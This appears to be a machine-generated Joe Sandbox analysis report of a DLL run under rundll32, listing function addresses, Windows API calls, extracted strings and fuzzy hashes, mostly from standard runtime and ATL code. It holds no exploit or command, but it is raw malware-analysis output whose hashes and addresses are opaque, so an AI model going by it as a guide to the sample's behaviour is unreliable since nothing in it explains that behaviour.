_free.LIBCMT ref: 615D4667
_free.LIBCMT ref: 615D4670
_free.LIBCMT ref: 615D494E
_free.LIBCMT ref: 615D4956

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 67f32c74796142d832436d0cea61a150c88cb081e8a5bb91ef5b188e621bf5c4
Instruction ID: 0967ef9ab7959d8456beda261fe21d58bcb4930978098c09044d0a10c18b8f54
Opcode Fuzzy Hash: 67f32c74796142d832436d0cea61a150c88cb081e8a5bb91ef5b188e621bf5c4
Instruction Fuzzy Hash: 48C11272D40205AFDB10CFE8CC82FDEB7F8AB89B14F558555FA04EB281D6709D418795

Uniqueness

Uniqueness Score: -1.00%

Function 615AF070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 615AEEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,3F3F20BC,00000000,00000000), ref: 615AEEEE
Part of subcall function 615AEEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 615AEF1B
Part of subcall function 615AEEB0: CharNextW.USER32(74ECEEF0,?,?,00000000), ref: 615AEF34
Part of subcall function 615AEEB0: CharNextW.USER32(74ECEEF0,?,?,00000000), ref: 615AEF3F
Part of subcall function 615AEEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 615AEFAE

lstrcmpiW.KERNEL32(?,615E8A28,?,3F3F20BC,C000008C,00000000,?,?,00000000,615D9BA6,000000FF,?,615B00F7,00000000,00000000,C000008C), ref: 615AF0F3
lstrcmpiW.KERNEL32(?,615E8A2C,?,615B00F7,00000000,00000000,C000008C,C000008C), ref: 615AF10A

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: fd6909c35b97ff9400c7c91d3726ae11b2b31bf7094c498a3777569db207b012
Instruction ID: 6dd4af84ee8fa26fabcb7b45414a120618095e8d2ddd8665629acb6c9de54c2c
Opcode Fuzzy Hash: fd6909c35b97ff9400c7c91d3726ae11b2b31bf7094c498a3777569db207b012
Instruction Fuzzy Hash: 1FD1D271D80219CBDB25CF64CC58BDDF7B5AF59310F0584A6EA49A7240E730AE99CF60

Uniqueness

Uniqueness Score: -1.00%

Function 615CF447, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,*[a,615BE12A,?,?,?,615CF698,00000001,00000001,F9E85006), ref: 615CF4A1
__alloca_probe_16.LIBCMT ref: 615CF4D9
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,615CF698,00000001,00000001,F9E85006,?,?,?), ref: 615CF527
__alloca_probe_16.LIBCMT ref: 615CF5BE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 615CF621
__freea.LIBCMT ref: 615CF62E

Part of subcall function 615C9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,615B8F9C,00000105,000000FF,FFFFFFFF,00000000,?,615A1687,?,00000103,000000FF), ref: 615C9C04

__freea.LIBCMT ref: 615CF637
__freea.LIBCMT ref: 615CF65C

Strings

*[a, xrefs: 615CF459

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: *[a
API String ID: 3864826663-1444688163
Opcode ID: 9cc54c8797ebe98157f930167fd0d5aa71fb6ebe76b8786710a286529be77706
Instruction ID: ffd4d7df55968bc0a2652ebc05e166c4a27c0c8b6ffdea522d0a381f6e906078
Opcode Fuzzy Hash: 9cc54c8797ebe98157f930167fd0d5aa71fb6ebe76b8786710a286529be77706
Instruction Fuzzy Hash: 22510672600206ABEB158EF4CC41EAFFBA9EB85B54F11C62EF914D6150EB34DC85C752

Uniqueness

Uniqueness Score: -1.00%

Function 615B34B0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(615EFAA4,?,?), ref: 615B34FA
GetClassInfoExW.USER32 ref: 615B352D
GetClassInfoExW.USER32 ref: 615B3544
LeaveCriticalSection.KERNEL32(615EFAA4), ref: 615B3553
LoadCursorW.USER32(615A0000,00007F00), ref: 615B35A7
GetClassInfoExW.USER32 ref: 615B35FE
RegisterClassExW.USER32 ref: 615B3615
LeaveCriticalSection.KERNEL32(615EFAA4), ref: 615B36C3

Strings

ATL:%p, xrefs: 615B35C8

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: ATL:%p
API String ID: 269841140-4171052921
Opcode ID: 3ca0888fce1a6a0913d542435dbbfce8e68229de85b1982d429b71ba48b590d0
Instruction ID: 008d1234c634a20ec954d4c6c9ad4f4307cf7a182869206d4959d3e09b4f2f02
Opcode Fuzzy Hash: 3ca0888fce1a6a0913d542435dbbfce8e68229de85b1982d429b71ba48b590d0
Instruction Fuzzy Hash: 3871CF30D017058BDB20CFA9C5506AEF7F1FF99314B16C61EE856AB690EB30A984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 615A5570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 615A55AE
__Getcvt.LIBCPMT ref: 615A55D3

Strings

true, xrefs: 615A5669
false, xrefs: 615A5630

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: d6163a78948f1e73f11411e04bf64b73ef94905b00022257b9718eb84157385f
Instruction ID: f1a21c8598daf5a3536d91f270999a166aed7c28497f40c476d507e1593bd446
Opcode Fuzzy Hash: d6163a78948f1e73f11411e04bf64b73ef94905b00022257b9718eb84157385f
Instruction Fuzzy Hash: B8514031A042418FDB10CFA8D840B6EFFE5EBC5314F18C4AEE8549B385DB76A901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 615B1130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 615B1148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 615B1175
MulDiv.KERNEL32(00000008,00000000), ref: 615B117E
CreateFontW.GDI32(00000000), ref: 615B1187
ReleaseDC.USER32 ref: 615B1194
SetTimer.USER32(?,000003E8,000003E8,00000000), ref: 615B11A9

Part of subcall function 615B2460: BeginPaint.USER32(?,?), ref: 615B24A3
Part of subcall function 615B2460: GetParent.USER32(?), ref: 615B24AC
Part of subcall function 615B2460: GetClientRect.USER32 ref: 615B24C2
Part of subcall function 615B2460: CreateCompatibleDC.GDI32(?), ref: 615B24C8
Part of subcall function 615B2460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 615B24EA
Part of subcall function 615B2460: SelectObject.GDI32(00000000,00000000), ref: 615B24F6
Part of subcall function 615B2460: SelectObject.GDI32(00000000,?), ref: 615B2508
Part of subcall function 615B2460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 615B2521
Part of subcall function 615B2460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 615B252F
Part of subcall function 615B2460: SetBkMode.GDI32(?,00000001), ref: 615B2538
Part of subcall function 615B2460: SetTextColor.GDI32(?,00FFFFFF), ref: 615B2544
Part of subcall function 615B2460: GetClientRect.USER32 ref: 615B2556
Part of subcall function 615B2460: ClientToScreen.USER32(?,?), ref: 615B2564
Part of subcall function 615B2460: ClientToScreen.USER32(?,?), ref: 615B2579
Part of subcall function 615B2460: ClientToScreen.USER32(?,?), ref: 615B259B

DeleteObject.GDI32(?), ref: 615B11D0

Strings

Arial, xrefs: 615B114E

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 036996517ffc38652fbc1505882b9882b0d5c918a86e41fbf0d796d0b6c079e3
Instruction ID: 84d242209e4683d04b624d454436d7dc64f9cb5cd0b1ee6b59b2109d2fa44f96
Opcode Fuzzy Hash: 036996517ffc38652fbc1505882b9882b0d5c918a86e41fbf0d796d0b6c079e3
Instruction Fuzzy Hash: 7E31F671600205ABEB11AF68DC86B5EFBB9FF46311F118112F515DA1D0C7B1E8A1DB94

Uniqueness

Uniqueness Score: -1.00%

Function 615CA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 615CA188

Part of subcall function 615C9B98: HeapFree.KERNEL32(00000000,00000000,?,615C731A,000000FF,000000FF), ref: 615C9BAE
Part of subcall function 615C9B98: GetLastError.KERNEL32(615C6995,?,615C731A,000000FF,000000FF), ref: 615C9BC0

_free.LIBCMT ref: 615CA194
_free.LIBCMT ref: 615CA19F
_free.LIBCMT ref: 615CA1AA
_free.LIBCMT ref: 615CA1B5
_free.LIBCMT ref: 615CA1C0
_free.LIBCMT ref: 615CA1CB
_free.LIBCMT ref: 615CA1D6
_free.LIBCMT ref: 615CA1E1
_free.LIBCMT ref: 615CA1EF

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4d40883a15c58a2f03f65446d79b98ddbf2a0bb4a2c4ddd171560d5ce8480583
Instruction ID: bea7cb53202ea33507970f9cf3651e3d5da0e9956b52cd6f5771961d49fa723e
Opcode Fuzzy Hash: 4d40883a15c58a2f03f65446d79b98ddbf2a0bb4a2c4ddd171560d5ce8480583
Instruction Fuzzy Hash: 8711A47651410ABFCB01DF94C841CDDBBB5EF8575CB8285A9B9089F231DB31DE509B82

Uniqueness

Uniqueness Score: -1.00%

Function 615CBE31, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

_memcmp.LIBVCRUNTIME ref: 615CC0DB
_free.LIBCMT ref: 615CC14C
_free.LIBCMT ref: 615CC165
_free.LIBCMT ref: 615CC197
_free.LIBCMT ref: 615CC1A0
_free.LIBCMT ref: 615CC1AC

Strings

;\[a, xrefs: 615CC129
C, xrefs: 615CBF99

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: ;\[a$C
API String ID: 1679612858-1773710399
Opcode ID: dcd0a6ef684ec8345c5fbb47fb5ea31d61180c5068bbd10f74cffe0c7e6b40c3
Instruction ID: c87074bad6d3a8830e58d62acf9ada53f047040a9e20f792510e53d60f81e9cd
Opcode Fuzzy Hash: dcd0a6ef684ec8345c5fbb47fb5ea31d61180c5068bbd10f74cffe0c7e6b40c3
Instruction Fuzzy Hash: 0DB14775A0121A9FDB25DF98C884A9DF7B4FB49B04F5085AED809A7350E731AE90CF81

Uniqueness

Uniqueness Score: -1.00%

Function 615AE310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,3F3F20BC,?,?,?,615D9A60,000000FF), ref: 615AE349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 615AE359
GetModuleHandleW.KERNEL32(Advapi32.dll,3F3F20BC,?,?,?,615D9A60,000000FF), ref: 615AE3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 615AE3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 615AE418

Strings

RegDeleteKeyTransactedW, xrefs: 615AE353
RegDeleteKeyExW, xrefs: 615AE3C3
Advapi32.dll, xrefs: 615AE344, 615AE3B4

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 4a7dc2cd3be7c05e03c885950a4d35e9488eb48e0952b9e7c67538f1cbf95ac2
Instruction ID: 403b49a13d3aa132607ddb08ead86dd68bc127332470ce339f273f5aec8ea4da
Opcode Fuzzy Hash: 4a7dc2cd3be7c05e03c885950a4d35e9488eb48e0952b9e7c67538f1cbf95ac2
Instruction Fuzzy Hash: C131F472A48204AFEF11CF4AE804F5DFBB9EB46710F02856BE824D3640C736A490DB55

Uniqueness

Uniqueness Score: -1.00%

Function 615A9100, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 615A9149
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 615A9171
VariantClear.OLEAUT32(?), ref: 615A9189

Part of subcall function 615A8E70: SysFreeString.OLEAUT32(?), ref: 615A8ECE
Part of subcall function 615A8E70: SysAllocString.OLEAUT32(?), ref: 615A8F39

_com_issue_error.COMSUPP ref: 615A91AF

Strings

name, xrefs: 615A9248
counter, xrefs: 615A963B, 615A9666
value, xrefs: 615A93D0
page, xrefs: 615A99EB, 615A9A16

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: af4db01cd5414cd0d86a8c0554f91835c75f4ad74181d0235a8b84524bdbe330
Instruction ID: 7f30b8dec2649d9c996f9a35f602c1f7eb2b75ace19994aef3ea24e73ef4d4a1
Opcode Fuzzy Hash: af4db01cd5414cd0d86a8c0554f91835c75f4ad74181d0235a8b84524bdbe330
Instruction Fuzzy Hash: 78118171E4410AABDB10DFA4C904BDEFBF8FB89710F11852AE915A3240DB35AD44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 615B829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,615B85E0,615F0D10,C000008C,?,?,615B30BC,?,3F3F20BC,00000000,00000000,615D98D0,000000FF), ref: 615B82AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,615B85E0,615F0D10,C000008C,?,?,615B30BC,?,3F3F20BC,00000000,00000000), ref: 615B82C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 615B833E

Strings

AtlThunk_InitData, xrefs: 615B82EA
AtlThunk_FreeData, xrefs: 615B8318
atlthunk.dll, xrefs: 615B82BD
AtlThunk_AllocateData, xrefs: 615B82D3
AtlThunk_DataToCode, xrefs: 615B8301

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 792b00c2d22faa3e5dae005ee4907427d6b5e7019dabe98e9b66c1174c48e5a5
Instruction ID: cb9c3d5934e5aab902abc64f609672826c2d67d4f5456e87df89c75b49161f61
Opcode Fuzzy Hash: 792b00c2d22faa3e5dae005ee4907427d6b5e7019dabe98e9b66c1174c48e5a5
Instruction Fuzzy Hash: 4301C430C121166BEE015E66DC10B8EFB569F02189F0DD050FC14F63A5EB31A545DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 615D128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8289ba862638f54873ac0ce7196ae5939d54dcc850842ab2d25372f320af2c1
Instruction ID: ab38ef10dde0263b6f524adba747d88dd0072626bfe5557c548e8c6fa42ff631
Opcode Fuzzy Hash: f8289ba862638f54873ac0ce7196ae5939d54dcc850842ab2d25372f320af2c1
Instruction Fuzzy Hash: C3C191B4E0428A9FEB01CFECC8C0BADFBB5AF4A314F498599E415A7381C7349941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 615A2120, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 615A221D

Part of subcall function 615B94A7: RaiseException.KERNEL32(?,?,615B6476,000000FF,00000000,00000000,FFFFFFFF,?,?,?,?,615B6476,000000FF,615ECD2C,?,000000FF), ref: 615B9507

__CxxThrowException@8.LIBVCRUNTIME ref: 615A2262
___std_exception_copy.LIBVCRUNTIME ref: 615A228F

Strings

ios_base::badbit set, xrefs: 615A2227, 615A2252, 615A2273
ios_base::failbit set, xrefs: 615A2135
X"Za, xrefs: 615A213F, 615A21D5
X"Za, xrefs: 615A214D

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: X"Za$X"Za$ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-725842858
Opcode ID: de3d9259a5a42ba965c2de5d7814c54cfe30a7d14313b37c0aff7d451006feb1
Instruction ID: 1c56e7706566d4a3324793cd0bf5c50834e650116c855dcd726faafdf8701499
Opcode Fuzzy Hash: de3d9259a5a42ba965c2de5d7814c54cfe30a7d14313b37c0aff7d451006feb1
Instruction Fuzzy Hash: C141E675900209AFD700DFA9CC41B9EFBF9EF89324F14C61AF524E7680E775A9448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 615B9350, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 615B937B
___except_validate_context_record.LIBVCRUNTIME ref: 615B9383
_ValidateLocalCookies.LIBCMT ref: 615B9411
__IsNonwritableInCurrentImage.LIBCMT ref: 615B943C
_ValidateLocalCookies.LIBCMT ref: 615B9491

Strings

;\[a, xrefs: 615B9455
csm, xrefs: 615B9426

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ;\[a$csm
API String ID: 1170836740-2570935197
Opcode ID: da5a9e5a47f44c66da2e6d33bfede708690709694a36a5ae19af7b514235513b
Instruction ID: aa68c240260b947600a2924da439263b951dab0555275a2aa33263fe5044cd7f
Opcode Fuzzy Hash: da5a9e5a47f44c66da2e6d33bfede708690709694a36a5ae19af7b514235513b
Instruction Fuzzy Hash: 2841C474E012199BCF00CFA9C8A0A9EFFB5BF96318F14C155E8259B391D735DA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 615CA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
_free.LIBCMT ref: 615CA2EF
_free.LIBCMT ref: 615CA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA330
SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
_abort.LIBCMT ref: 615CA342

Strings

ios_base::failbit set, xrefs: 615CA296

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: b96330dc4faf041d36b16d16db9629b77825c6efb35c0cf61e7d2930be637937
Instruction ID: 7319f684663bf6635612403b153517aa45ffe1f90ed1f1bcda5725443ea6ebeb
Opcode Fuzzy Hash: b96330dc4faf041d36b16d16db9629b77825c6efb35c0cf61e7d2930be637937
Instruction Fuzzy Hash: 2111E5355185126AEA112EF9DC15B6EEE6AABC3F79B17C21DF434911E0FF218C424353

Uniqueness

Uniqueness Score: -1.00%

Function 615B6698, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 615B669F
std::_Lockit::_Lockit.LIBCPMT ref: 615B66A9

Part of subcall function 615A19B0: std::_Lockit::_Lockit.LIBCPMT ref: 615A19CD
Part of subcall function 615A19B0: std::_Lockit::~_Lockit.LIBCPMT ref: 615A19E9

codecvt.LIBCPMT ref: 615B66E3
std::_Facet_Register.LIBCPMT ref: 615B66FA
std::_Lockit::~_Lockit.LIBCPMT ref: 615B671A
__CxxThrowException@8.LIBVCRUNTIME ref: 615B6738

Strings

;\[a, xrefs: 615B6707

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ;\[a
API String ID: 2594415655-3318329
Opcode ID: f5db84c146c2a6ef72cdb7c93da85db4e8279281ef2ad48261e9fd1de83d93cc
Instruction ID: 2018339ab7f9bc1c9cb53b2ba154ad674dc4c7ee4626e233c3147a1ebceb5841
Opcode Fuzzy Hash: f5db84c146c2a6ef72cdb7c93da85db4e8279281ef2ad48261e9fd1de83d93cc
Instruction Fuzzy Hash: 4211A075D1021A8FCF05DBA4C864ABDF7B5BFC4318F158509D421AB290DF349E01CB91

Uniqueness

